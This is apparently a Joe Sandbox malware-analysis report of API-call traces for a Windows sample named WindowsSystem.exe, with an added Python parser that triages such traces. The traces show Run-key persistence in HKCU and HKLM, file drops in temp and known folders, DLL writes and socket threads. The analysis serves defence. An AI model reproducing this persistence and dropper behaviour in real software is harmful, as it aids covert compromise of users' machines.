                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$AllocCreateEvent$ErrorLastwnsprintf$CloseDirectoryFileHandleOpenProcess__snwprintfclosesocketsetsockoptshutdown
                                                                                                            • String ID: "%s" %s$%s%s$D$WindowsSystem.exe${0F01F64A-5A5B-4CC4-B069-D85368F634DD}${DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 2452205246-3446471135
                                                                                                            • Opcode ID: 99f339d34feb12b2d964579b71fa9e9e34c3d83888948618176e05a29208d458
                                                                                                            • Instruction ID: b0eff8b6dee8b2a600409c68ca380be9f6b81f023708e6900f41d7cd49a28287
                                                                                                            • Opcode Fuzzy Hash: 99f339d34feb12b2d964579b71fa9e9e34c3d83888948618176e05a29208d458
                                                                                                            • Instruction Fuzzy Hash: 58513CB1A00218AFDB35EFA4DC49BADB779BF48700F1085A8F60DA7291DB745984CF51
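                                                                                                             Added example (not part of the Joe Sandbox report and not code from the sample): a small Python parser for the function-trace blocks shown in this section. It turns the "APIs" bullets into structured calls (name, module, hex arguments, ref address, and whether the call sits inside a "Part of subcall function" line), reads the "API ID" and "String ID" lines under "Similarity", and applies a few triage rules that a reviewer would otherwise apply by eye: shortcut/batch path templates combined with SHGetKnownFolderPath, DeleteFileW/RemoveDirectoryW on those same templates (the cleanup routine at 0031317A), CreateProcessW next to a hard-coded .exe name, a GUID passed to OpenEventW/CreateEventW, and CreateFileW opened with GENERIC_WRITE and CREATE_ALWAYS. The SAMPLE_BLOCK text is a constructed, condensed copy of the second and third listings above; the rule names and messages are the example's own. The rule deliberately reports "under a known folder", not "in the Startup folder": the KNOWNFOLDERID is passed by pointer (00337BF0, 00337C00) and is not resolved in the trace itself.

```python
"""Parse a Joe Sandbox IDA-plugin function-trace block and apply simple triage rules."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: condensed from two function listings in the report above.
SAMPLE_BLOCK = r"""APIs
• LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,00315BA8), ref: 0031317A
• SHGetKnownFolderPath.SHELL32(00337BF0,00000000,00000000,?), ref: 00313196
• __snwprintf.LIBCMT ref: 003131B7
• DeleteFileW.KERNEL32(00000000), ref: 003131C3
• RemoveDirectoryW.KERNEL32(00000000), ref: 00313279
• OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030E30A
• CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0030E2CB
  • Part of subcall function 0030B6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0030B773
Strings
Similarity
• API ID: Local$Free$Alloc__snwprintf$DeleteFileFolderKnownPathTask$DirectoryRemove
• String ID: %s\%s$%s\%s.lnk$%s\%s\%s.BAT$WindowsSystem.exe${18925F49-C14F-4A5B-BA0F-9C4106DA4CB0}
"""

# One "APIs" bullet: optional subcall prefix, Name.MODULE, optional (args), ", ref: ADDR".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")

GENERIC_WRITE = 0x40000000  # CreateFileW dwDesiredAccess bit
CREATE_ALWAYS = 2           # CreateFileW dwCreationDisposition


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # address of the callee when listed as "Part of subcall"


@dataclass
class FunctionTrace:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    strings: List[str] = field(default_factory=list)

    def has(self, *names: str) -> bool:
        return any(c.name in names for c in self.calls)


def _hex(token: str) -> Optional[int]:
    """Decode a hex argument; '?' and other unresolved tokens return None."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def parse_block(text: str) -> FunctionTrace:
    """Parse one function listing (APIs ... Similarity) into a FunctionTrace."""
    trace = FunctionTrace()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            trace.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        body = line.strip().lstrip("•").strip()
        if body.startswith("API ID:"):
            trace.api_id = body[len("API ID:"):].strip()
        elif body.startswith("String ID:"):
            # Joe Sandbox joins the referenced strings with '$'.
            trace.strings = [s for s in body[len("String ID:"):].strip().split("$") if s]
    return trace


def triage(trace: FunctionTrace) -> List[str]:
    """Return human-readable findings for the behaviours a reviewer would flag."""
    findings: List[str] = []
    startup_like = [s for s in trace.strings if s.lower().endswith((".lnk", ".bat"))]
    if startup_like and trace.has("SHGetKnownFolderPath"):
        findings.append("builds shortcut/batch paths under a known folder: " + ", ".join(startup_like))
    if startup_like and trace.has("DeleteFileW", "RemoveDirectoryW"):
        findings.append("deletes those shortcut/batch artifacts (cleanup/uninstall routine)")
    exes = [s for s in trace.strings if s.lower().endswith(".exe")]
    if exes and trace.has("CreateProcessW"):
        findings.append("spawns a hard-coded binary name: " + ", ".join(exes))
    for c in trace.calls:
        if c.name in ("OpenEventW", "CreateEventW"):
            for a in c.args:
                if GUID_RE.fullmatch(a):
                    findings.append(f"named event {a} used for single-instance/sync (ref {c.ref})")
        if c.name == "CreateFileW" and len(c.args) >= 5:
            access, disposition = _hex(c.args[1]), _hex(c.args[4])
            if access is not None and access & GENERIC_WRITE and disposition == CREATE_ALWAYS:
                where = f" inside subcall {c.subcall_of}" if c.subcall_of else ""
                findings.append(f"writes a file with GENERIC_WRITE|CREATE_ALWAYS{where} (ref {c.ref})")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_block(SAMPLE_BLOCK)):
        print("-", finding)
```

                                                                                                             Feed it the text of any one function listing from this section (everything from "APIs" through the "String ID" line); listings with no Similarity strings simply produce fewer findings.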
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(UNLOAD.TXT), ref: 003169AE
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003169C0
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0030BA30,00000000,00000000,00000000), ref: 003169E3
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00316A01
                                                                                                            • _memset.LIBCMT ref: 00316A7A
                                                                                                            • __snwprintf.LIBCMT ref: 00316A9F
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00316AD9
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316B24
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0030F100,00000000,00000000,00000000), ref: 00316B47
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316B64
                                                                                                            • WSAStartup.WS2_32(00000002,?), ref: 00316B73
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0031B630,00000000,00000000,00000000), ref: 00316B95
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00321030,00000000,00000000,00000000), ref: 00316BAF
                                                                                                            • WSACleanup.WS2_32 ref: 00316BCA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$Thread$EventFreeLocal$CleanupCloseHandleStartup__snwprintf_memsetlstrlen
                                                                                                            • String ID: "%s%s"$UNLOAD.TXT$WindowsSystem$WindowsSystem$WindowsSystem.exe${34E50511-FBB8-42F8-98A2-2629192A03A0}
                                                                                                            • API String ID: 990009833-1681456302
                                                                                                            • Opcode ID: 8a9ad51967b76f7d1d183c917680fc54247895e0dac74e6357ee31005a2150f9
                                                                                                            • Instruction ID: d04372202399d70874e7a4bf35babbc6038ecf2cca43f0f5e7fd1dddfde06e52
                                                                                                            • Opcode Fuzzy Hash: 8a9ad51967b76f7d1d183c917680fc54247895e0dac74e6357ee31005a2150f9
                                                                                                            • Instruction Fuzzy Hash: 9F516170A90314ABE73B9BA4EC8BFD5366CAB09B05F108058F60DBA1E1D7F569C4CB15
                                                                                                            APIs
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0030FB03
                                                                                                            • GetLastError.KERNEL32 ref: 0030FB0E
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030FB26
                                                                                                            • wsprintfW.USER32 ref: 0030FB4F
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0030FB7A
                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 0030FBD1
                                                                                                            • GetLastError.KERNEL32 ref: 0030FBDD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030FC72
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030FC7C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030FC86
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030FCE3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$lstrlen$AllocCreateErrorFileLast$DirectoryFolderKnownModuleNamePathTask__snwprintfwsprintf
                                                                                                            • String ID: %s%s$P
                                                                                                            • API String ID: 4093884390-50959982
APIs
• SHGetKnownFolderPath.SHELL32(00337C30,00000000,00000000,00000000), ref: 0031346D
• _memset.LIBCMT ref: 00313492
• lstrlenW.KERNEL32(00000000), ref: 0031349E
• __snwprintf.LIBCMT ref: 003134D5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 003134E6
• GetLastError.KERNEL32 ref: 00313508
• LocalAlloc.KERNEL32(00000040,00000208), ref: 00313520
• __snwprintf.LIBCMT ref: 00313551
• lstrlenW.KERNEL32(00000000), ref: 00313560
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00313575
• LocalAlloc.KERNEL32(00000040,00000208), ref: 00313591
• _memmove.LIBCMT ref: 003135C2
• CoTaskMemFree.COMBASE(00000000), ref: 003135CE
• LocalFree.KERNEL32(00000000), ref: 003135DB
• RemoveDirectoryW.KERNEL32(00000000), ref: 003135F0
• LocalFree.KERNEL32(00000000), ref: 003135FD
• RemoveDirectoryW.KERNEL32(?), ref: 0031360A
• CoTaskMemFree.COMBASE(00000000), ref: 00313614
Similarity
• API ID: DirectoryFreeLocal$AllocCreateRemoveTask__snwprintflstrlen$ErrorFolderKnownLastPath_memmove_memset
• String ID: %s\System32$\\?\%s
• API String ID: 2912166009-2868705786
APIs
  • Part of subcall function 00310010: SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00316B10,00371178,00316B10), ref: 00310023
  • Part of subcall function 00310010: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00310034
  • Part of subcall function 00310010: wnsprintfW.SHLWAPI ref: 0031005F
  • Part of subcall function 00310010: lstrlenW.KERNEL32(?), ref: 00310070
  • Part of subcall function 00310010: CoTaskMemFree.COMBASE(?), ref: 0031007F
  • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B,00316B10,00000000), ref: 003081EB
  • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B), ref: 00308205
  • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308235
  • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308251
  • Part of subcall function 003081C0: LocalFree.KERNEL32(00000000), ref: 00308A43
• LocalFree.KERNEL32(00000000), ref: 00308AE0
• LocalFree.KERNEL32(00000000), ref: 00308AF0
• LocalAlloc.KERNEL32(00000040,00030010), ref: 00308B3B
• LocalAlloc.KERNEL32(00000040,00008AD0), ref: 00308B55
• _memmove.LIBCMT ref: 00308B76
• lstrcpyW.KERNEL32(00000000,00000000), ref: 00308B86
• lstrcpyW.KERNEL32(-00010000,00000000), ref: 00308B99
• lstrcpyW.KERNEL32(-00020000,00000000), ref: 00308BAD
• LocalFree.KERNEL32(00000000), ref: 00308C32
• LocalFree.KERNEL32(00000000), ref: 00308C3C
• LocalFree.KERNEL32(00000000), ref: 00308C46
• LocalFree.KERNEL32(00000000), ref: 00308C57
• LocalFree.KERNEL32(00000000), ref: 00308C61
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00308C98
• LocalFree.KERNEL32(00000000), ref: 00308CA2
• LocalFree.KERNEL32(00000000), ref: 00308CAC
• LocalFree.KERNEL32(00000000), ref: 00308CB6
Similarity
• API ID: Local$Free$Alloc$lstrcpywnsprintf$FolderKnownPathTaskVirtual_memmovelstrlen
• String ID: (Z6
• API String ID: 586337011-1190260237
APIs
  • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
  • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
  • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
  • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0030B701
• GetLastError.KERNEL32 ref: 0030B70C
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030B724
• __snwprintf.LIBCMT ref: 0030B74E
• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0030B773
• GetLastError.KERNEL32 ref: 0030B77C
• LocalFree.KERNEL32(00000000), ref: 0030B7FC
• LocalFree.KERNEL32(00000000), ref: 0030B806
• LocalFree.KERNEL32(00000000), ref: 0030B851
Similarity
• API ID: Local$Free$lstrlen$AllocCreateErrorLast__snwprintf$DirectoryFileFolderKnownPathTask
• String ID: %s%s$P$WindowsSystem.exe
• API String ID: 3676116642-2053195313
Similarity
• API ID:
• String ID: <$GET
• API String ID: 0-427699995
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <$GET
                                                                                                            • API String ID: 0-427699995
                                                                                                            • Opcode ID: a9eba876acba732a5e5f3b9976efd5839ce53ba24e397240f2c3bb596f27c7ec
                                                                                                            • Instruction ID: 96fba26775fe6e71989d9f6c759e1ade490ec0f9c1a95ba5bac76a0dc0e996e8
                                                                                                            • Opcode Fuzzy Hash: a9eba876acba732a5e5f3b9976efd5839ce53ba24e397240f2c3bb596f27c7ec
                                                                                                            • Instruction Fuzzy Hash: CFF10070A00218DFDB65CFA4CD99BEDB7B9BF48700F108599E54AAB280DB749AC4CF50
APIs
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0030BA41
• SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 0030BA5F
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BA74
• __snwprintf.LIBCMT ref: 0030BA9E
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0030BAC0
• CloseHandle.KERNEL32(000000FF), ref: 0030BAEF
• LocalFree.KERNEL32(00000000), ref: 0030BB00
• CoTaskMemFree.COMBASE(?), ref: 0030BB0A
• OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030BB1C
• SetEvent.KERNEL32(00000000), ref: 0030BB2F
• CloseHandle.KERNEL32(00000000), ref: 0030BB39
• CloseHandle.KERNEL32(000000FF), ref: 0030BB4B
• LocalFree.KERNEL32(00000000), ref: 0030BB55
• CoTaskMemFree.COMBASE(?), ref: 0030BB5F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait__snwprintf
• String ID: %s\%s$UNLOAD.TXT${DD700AA6-D197-4A4A-838A-B93EA96F236B}
• API String ID: 1432346771-3124979191
• Opcode ID: cdf08558ca2e2a398a3f59c7ad4b5e171d3263b5c68544596283d6b5fe657330
• Instruction ID: a8523a8d6c7bec30fa58a0da0e63b9072a70a6a84669748ecbf43e120b85ddaa
• Opcode Fuzzy Hash: cdf08558ca2e2a398a3f59c7ad4b5e171d3263b5c68544596283d6b5fe657330
• Instruction Fuzzy Hash: F2316175E01304FBDB369BA4DC5EBADBB78EB08711F108658F615A62D0D7789A80CB50
APIs
  • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
  • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
  • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
  • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031258B
• wnsprintfW.SHLWAPI ref: 003125BA
• RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 003125DD
• RegSetValueExW.ADVAPI32(?,00376FC8,00000000,00000001,?,?), ref: 00312600
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00316AED), ref: 0031260A
• RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00312627
• RegSetValueExW.ADVAPI32(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},00000000,00000001,?,?), ref: 0031264A
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00316AED), ref: 00312654
• LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00316AED), ref: 0031265E
• LocalFree.KERNEL32(00000000), ref: 00312668
Strings
• j1, xrefs: 00312566, 00312569
• {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 00312641
• {34E50511-FBB8-42F8-98A2-2629192A03A0}, xrefs: 0031259E
• SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0031261D
• WindowsSystem.exe, xrefs: 003125A3
• Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 003125D3
• %s%s %s, xrefs: 003125AC
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Local$Freelstrlen$AllocCloseOpenValue$FolderKnownPathTask__snwprintfwnsprintf
• String ID: %s%s %s$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WindowsSystem.exe${34E50511-FBB8-42F8-98A2-2629192A03A0}${AB1F3E47-AEF1-400E-A108-233A046C3A34}$j1
• API String ID: 3858463887-2459602844
• Opcode ID: 07c87a2a4c96ef75ea048bcb13fdede030e2aad7ae317b99063c2765dd969c22
• Instruction ID: 06562f092fd24b01d81b039a50d6dedcafded6108ec1dd7d3463c07c33964a8d
• Opcode Fuzzy Hash: 07c87a2a4c96ef75ea048bcb13fdede030e2aad7ae317b99063c2765dd969c22
• Instruction Fuzzy Hash: 40318F75A00209BFDB36DBA0CC89FEEB77DAF48704F008418F609A6190D6B5A981CB20
APIs
• LocalAlloc.KERNEL32(00000040,?), ref: 0031271C
• _memmove.LIBCMT ref: 0031273B
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00312788
• GetTempPathW.KERNEL32(00007FFF,00000000), ref: 003127A4
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003127B9
• __snwprintf.LIBCMT ref: 003127E2
• CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000002,00000000,00000000), ref: 003127FD
• WriteFile.KERNEL32(000000FF,00000000,00000000,?,00000000), ref: 0031281E
• CloseHandle.KERNEL32(000000FF), ref: 00312830
• LocalFree.KERNEL32(00000000), ref: 0031283A
• CloseHandle.KERNEL32(000000FF), ref: 00312849
• DeleteFileW.KERNEL32(00000000), ref: 00312853
• LocalFree.KERNEL32(00000000), ref: 0031285D
• LocalFree.KERNEL32(00000000), ref: 00312867
• LocalFree.KERNEL32(00000000), ref: 00312871
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Local$Free$AllocFile$CloseHandle$CreateDeletePathTempWrite__snwprintf_memmove
• String ID: %s%s
• API String ID: 2323091063-3252725368
• Opcode ID: 5a78b0c2d710ff5f298abbfcbeaf2f378b8259aa1a6bcb38cbe4d9e665f2c6cd
• Instruction ID: 30eef6663aa972e2527e3a99cc9591c0e6486cd4a375569ce6c7c7bada6926ce
• Opcode Fuzzy Hash: 5a78b0c2d710ff5f298abbfcbeaf2f378b8259aa1a6bcb38cbe4d9e665f2c6cd
• Instruction Fuzzy Hash: 37410B75A00209EBDB25DFA4DC89FEFBBB9BF48700F104558FA15A7290C7749A90CB50
APIs
• LocalAlloc.KERNEL32(00000040,00306D26,?,00306D8A,00000000,00000000,?), ref: 00309416
• _memmove.LIBCMT ref: 00309435
• lstrcpyW.KERNEL32(?,00000000,00000000,00000000), ref: 003094FF
• StrStrIW.SHLWAPI(?,.DLL), ref: 00309511
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 0030953C
• WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00309569
• CloseHandle.KERNEL32(?), ref: 00309581
• LocalFree.KERNEL32(00000000), ref: 0030958B
• CloseHandle.KERNEL32(?), ref: 0030959F
• LocalFree.KERNEL32(00000000), ref: 003095C9
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
